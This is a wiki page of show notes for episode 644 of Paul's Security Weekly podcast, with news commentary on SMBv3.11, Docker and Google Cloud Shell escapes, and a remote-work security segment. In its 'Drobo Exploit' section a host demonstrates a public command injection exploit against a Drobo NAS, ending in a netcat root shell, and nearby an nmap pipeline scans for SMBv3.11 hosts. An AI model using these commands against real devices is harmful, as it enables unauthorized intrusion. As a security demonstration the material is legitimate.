PSWEpisode644

From Security Weekly Wiki
Revision as of 18:24, 20 March 2020 by Paul Asadoorian (talk | contribs) (Added By Paul's Craptastic PPWorks Code)
Jump to navigationJump to search

Paul's Security Weekly Episode 644 - 2020-03-19

Episode Audio

Paul's Security Weekly Episode 644

Announcements

  • Register for our upcoming webcasts and virtual trainings by visiting securityweekly.com selecting the webcast/training drop down from the top menu bar and clicking registration. In our first virtual training with Online Business Systems you will learn how to generate a complex SHA-256 hashed password and then use password cracking tools to break it. In our next webcast with Gravwell, we will cut through the marketing buzzwords and teach you about collecting & analyzing logs in hybrid cloud environments.
  • CyberSecurity Exchange Day hosted by OSHEAN and the Pell Center was originally scheduled for Wednesday, March 18th and has currently been postponed. The new date is still TBD and we will keep you posted as soon as we hear more!
  • SecureWorld Boston was scheduled for March 25th & 26th at the Hynes Convention Center. The event has been postponed until further notice. We will keep you in the loop as soon as we know more!
  • InfoSecWorld 2020 was originally scheduled for March 30 - April 1, 2020 at the Disney Contemporary Resort! This conference has been rescheduled for June 22nd-24th due to COVID-19. Security Weekly listeners still save 15% off the InfoSec World Main Conference or World Pass! Visit securityweekly.com/ISW2020, click the register button to register with our discount code or the schedule button to sponsor a micro-interview!

News - Drobo Exploit, Docker Escape, SMBv3.11

Microsoft SMBv3.11 Vulnerability and Patch CVE-20200796 Explained, Drobo 5N2 4.1.1 - Remote Command Injection, $100K Paid Out for Google Cloud Shell Root Compromise, WordPress, Apache Struts Attract the Most Bug Exploits, Run Docker nginx as Non-Root-User.


grep -P '\d+\.\d+\.\d+\.\d+|^\|.\s+3.11' | tr '\n' ' ' | sed -e 's/Nmap scan report for/\n/g; s/\|//g; s/\_//g'

WordPress, Apache Struts Attract the Most Bug Exploits - We have the tools and processes to fix this already, but many organizations don't do it, therefore I somewhat disagree with these statements: Even if best application development practices are used, framework vulnerabilities can expose organizations to security breaches.

Run Docker Nginx as Non-Root-User - In Docker, this is a problem as it means the container will drop you into root-level privileges by default for a shell (exploit or with docker exec -ti). So, for Docker, make sure you change this as the Docker Hub image for Nginx runs as root! They should really change this.


Jeff Man's Content:

Jeff Man 2-0.jpg


  1. Endpoint Security: Chain Of Trust Or Chain Of Fools?
  2. There is a Serious Lack of Corporate Responsibility During Breach Disclosures Ever notice that breached companies always send a letter stating, "We take the security of your data seriously [now]?"
  3. Semafone Bolsters Security Across its Product Line with New PCI DSS Certification Of course, there's no such thing as PCI DSS Certification...
  4. Five billion records exposed in open ‘data breach database’ ruh roh
  5. Five billion records exposed in open ‘data breach database’
  6. Cyber Attack Results in Defense Contractor Paying $500,000 Ransom

Joff Thyer's Content:

Joff Thyer-0.jpg


Template:PSW644NewsJoff Thyer

Larry Pesce's Content:

Larry headshot-0.jpg


Template:PSW644NewsLarry Pesce

Lee Neely's Content:

Lee Neely-0.jpg


  1. Authorities Helpless as Crypto-Currency Scams Rock Nigeria Beware of scams that offer high return on investment, particularly cryptocurrency. Lack of regulation and oversight make cryptocurrency attractive for this purpose.
  2. Russian Intelligence-Backed Hackers Go After Armenian Government Websites with New Code FSB backed Turla group continues to enhance WICHCOVEN & WHIPSNAP codes.

Coronavirus/COVID-19 Related Stories:

  1. State-Sponsored Hackers Are Now Using Coronavirus Lures to Infect Their Targets Groups from China, North Korea, and Russia are leveraging the COVID-19 crisis as click-bait. Increased diligence and awareness is called for.
  2. SANS Security Awareness Work From Home Deployment Kit
  3. C.S. Lewis on the Coronavirus s/Atomic Bomb/Coronavirus/g. Relevant advice from 72 years ago.
  4. U.S. tech firms work together to combat virus misinformation Well intended,and automation is tricky - Facebook was marking legitimate news articles about the coronavirus as spam due to a software bug
  5. John's Hopkins Coronavirus map Use genuine sources for COVID-19 data such as the John's Hopkins map.

Paul Asadoorian's Content:

Paul Asadoorian-0.png


  1. SANS Penetration Testing | Microsoft SMBv3.11 Vulnerability and Patch CVE-20200796 Explained | SANS Institute
    1. My version: nmap -p445 --open --script smb-protocols -Pn -n 172.16.1.0/24 | grep -P '\d+\.\d+\.\d+\.\d+|^\|.\s+3.11' | tr '\n' ' ' | sed -e 's/Nmap scan report for/\n/g; s/\|//g; s/\_//g'
  2. Drobo 5N2 4.1.1 - Remote Command Injection - See below!
  3. Remote Access Bad Stories | /dev/random
  4. Lulzbuster 1.3.2 Packet Storm
  5. Operators behind Nefilim Ransomware threaten to release stolen data - Interesting twist: The ransom note contains emails to contacts for the payment, it also includes the threat of leaking files if the ransom is not paid within seven days.
  6. $100K Paid Out for Google Cloud Shell Root Compromise - This is awesome: After launching a Cloud Shell, the researcher was able to connect to resources, determining that he was “trapped inside a Docker container” because there were only a small number of processes running. He was then able to escape the container and access the full host by examining the file system. "I noticed that there were two Docker UNIX sockets available,” explained ter Maat. “One in ‘/run/docker.sock’, which is the default path for our Docker client running inside the Cloud Shell (Docker inside Docker); the second one in ‘/google/host/var/run/docker.sock.'" This second socket was revealed to be a host-based Docker socket, as indicated by its pathname. "Anyone who can communicate with a host-based Docker socket can easily escape the container and gain root access on the host at the same time,” the researcher noted, adding that he wrote a quick script to do just that. After that, with root access, he was also able to reconfigure Kubernetes to flip all of the containers from unprivileged to privileged by writing a new “cs-6000.yaml” configuration file and setting the old config file to “/dev/null.”
  7. WordPress, Apache Struts Attract the Most Bug Exploits - We have the tools and processes to fix this already, but many organizations don't do it, therefore I somewhat disagree with these statements: Even if best application development practices are used, framework vulnerabilities can expose organizations to security breaches. Meanwhile, upgrading frameworks can be risky because changes can affect the behavior, appearance or inherent security of applications,” said Srinivas Mukkamala, CEO of RiskSense, in a media statement. “As a result, framework vulnerabilities represent one of the most important, yet poorly understood and often neglected elements of an organization’s attack surface.
  8. Run Docker nginx as Non-Root-User - By default, nginx runs as root. On a non-docker system, this is normally not an issue as the master process will run as root and then spawn other processes as a lower privileged user. It is normal to have processes running as root on a non-Docker system, though it should be configured differently but for whatever reason, it is the default. In Docker, this is a problem as it means the container will drop you into root-level privileges by default for a shell (exploit or with docker exec -ti). So, for Docker, make sure you change this as the Docker Hub image for nginx runs as root! They should really change this.
  9. TSA Admits Liquid Ban Is Security Theater - Schneier on Security

Coronavirus/COVID-19 Related Stories:

  1. DDoS attack on US Health agency part of coordinated campaign
  2. Why ransomware continues to knock on healthcare's door, enter, and create havoc - Help Net Security
  3. A cyberattack hits the US Department of Health and Human Services

Drobo Exploit

If you get this error:

paulda@hattori:~/source/drobo$ ./drobo.py 172.16.1.101 partyon
[INFO]: Connecting...
[INFO]: Pulling serial number...
Traceback (most recent call last):
  File "./drobo.py", line 224, in <module>
    m = re.search('<mSerial>([^<]+)</mSerial>', stat_msg.decode('utf-8'))
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xd1 in position 15: invalid continuation byte

Get the serial number:

$ nc 172.16.1.101 5000
DRINASD�<?xml version="1.0" encoding="utf-8"?>

<ESATMUpdate>
    <mESAUpdateSignature>ESAINFO</mESAUpdateSignature>
    <mESAUpdateVersion>1</mESAUpdateVersion>
    <mESAUpdateSize>29169</mESAUpdateSize>
    <mESAID>SERIALNUMBER</mESAID>
    <mSerial>SERIALNUMBER</mSerial>

Then run commands as follows:

Party On is fun:

$ ./drobo.py -s SERIALNUMBER 10.1.1.10 partyon
[INFO]: Connecting...
[INFO]: Pulling serial number...
[INFO]: Performing handshake...
[INFO]: Sending payload...
[INFO]: Waiting for response...
[INFO]: Response:
<?xml version="1.0" encoding="UTF-8"?>

<TMCmd>
    <CmdID>26</CmdID>
    <Result>8589934592</Result>
    <ResultDetails/>
</TMCmd>

[INFO]: Donezo.

That response is normal. A root shell is fun too:

$ ./drobo.py -s SERIALNUMBER 10.1.1.10 popit
[INFO]: Connecting...
[INFO]: Pulling serial number...
[INFO]: Performing handshake...
[INFO]: Sending payload...
[INFO]: Waiting for response...
[INFO]: Response:
<Error>1</Error>
[INFO]: Donezo.
$ nc 10.1.1.10 8383
��������
/ # id
id
uid=0(root) gid=0(root) context=system_u:system_r:kernel_t:s0


Technical Segment - Work from home securely

Description:

The challenges and differentiated values of desktop and laptop protection and administrative tool control (e.g., Powershell, SSH) for remote users and administrators to work securely.


Guest: Bio:
Peter Smith is Founder, CEO at Edgewise
Peter Smith, Edgewise Founder and CEO, is a serial entrepreneur who built and deployed Harvard University's first NAC system before it became a security category. Peter brings a security practitioner's perspective to Edgewise with more than ten years of expertise as an infrastructure and security architect of data centers and customer-hosting environments for Harvard University, Endeca Technologies (Oracle), American Express, Fidelity UK, Bank of America, and Nike.


Jeff Man's Content:

Jeff Man 2-0.jpg


  1. Working from Home: COVID-19’s Constellation of Security Challenges
  2. Microsoft Teams gets off to a wobbly start as the world and its cat starts working from home
  3. Deployment Kit for Securing Your Workforce at Home Archived, available for download/viewing
  4. 15 Coronavirus Online Scams to Watch Out For

Larry Pesce's Content:

Larry headshot-0.jpg


Template:PSW644Technical SegmentLarry Pesce

Lee Neely's Content:

Lee Neely-0.jpg


Template:PSW644Technical SegmentLee Neely

Paul Asadoorian's Content:

Paul Asadoorian-0.png


How remote users and administrators can work securely during this extended work from home time.

Desktop and Laptop protection
Challenge

  • Malware, threats propagate from desktops to server environment
  • Difficult to separate, for security reasons, development, staging and production environments
  • Managing access policies operationally complex
  • Attackers piggyback on address-based rules


Differentiated Value

  • Application segmentation protects clients and servers associated with the application regardless of where the hosts are located
  • Fully transparent protection, no impact on user experience
  • High performance, extremely low latency



Administrative tool control (e.g., Powershell, SSH)
Challenge

  • Admin tools provide a lot of deep access into the environment
  • Ripe targets for attackers to conduct “living off the land” exploits
  • Blacklist/whitelist approach is not practical when legitimate admin use is required because it is an extremely coarse control (e.g., no ability to allow access only to certain services)


Differentiated Value

  • Prevent download of malicious payloads from the internet by reducing the scope of remote systems (including public internet addresses) that admin tool software can connect to
  • Prevent admin tools from being misused for lateral movement by allowing only administrator clients to connect to client services. Further reduce the risk of lateral movement by preventing admin tools communication between servers
  • Adaptive control that automatically adjusts to legitimate changes in admin tool use
  • Monitor admin tool activity by reviewing logs in Edgewise or export rich data to SIEMs security monitoring tools via the API

Tyler Robinson's Content:

Tyler Robinson-0.png


Template:PSW644Technical SegmentTyler Robinson


Interview: Zen And The Art Of Logs In The Cloud - 6:00-6:45PM

Description:

Struggling with how to get your logs from the cloud? Have no fear, Corey and the Security Weekly crew talk about how to configure your logs in the cloud, use cloud-native services to handle the shuffling of logs in and out of the cloud, and control your costs! We conclude by talking a bit about Windows Event logs and overcoming some gotchas.

Content:

Visit https://securityweekly.com/gravwell to grab their open-source version and collect and analyze ALL of your logs. Drink all the booze, log all the things.

Guest: Bio:
Corey Thuen is Co-Founder at Gravwell
Corey Thuen is a founder of Gravwell and has spent over a decade doing cybersecurity at places like Department of Energy national labs, Digital Bond, and IOActive. That experience is now driving development of a full-stack analytics platform built to alleviate pain points he personally experienced from inflexible tools.

Hosts

Jeff Man - Sr. InfoSec Consultant at Online Business Systems
Larry Pesce - Senior Managing Consultant and Director of Research at InGuardians
Lee Neely - Senior Cyber Analyst at Lawrence Livermore National Laboratory
Paul Asadoorian - Founder & CTO at Security Weekly
Tyler Robinson - Managing Director of Network Operations at Nisos, Inc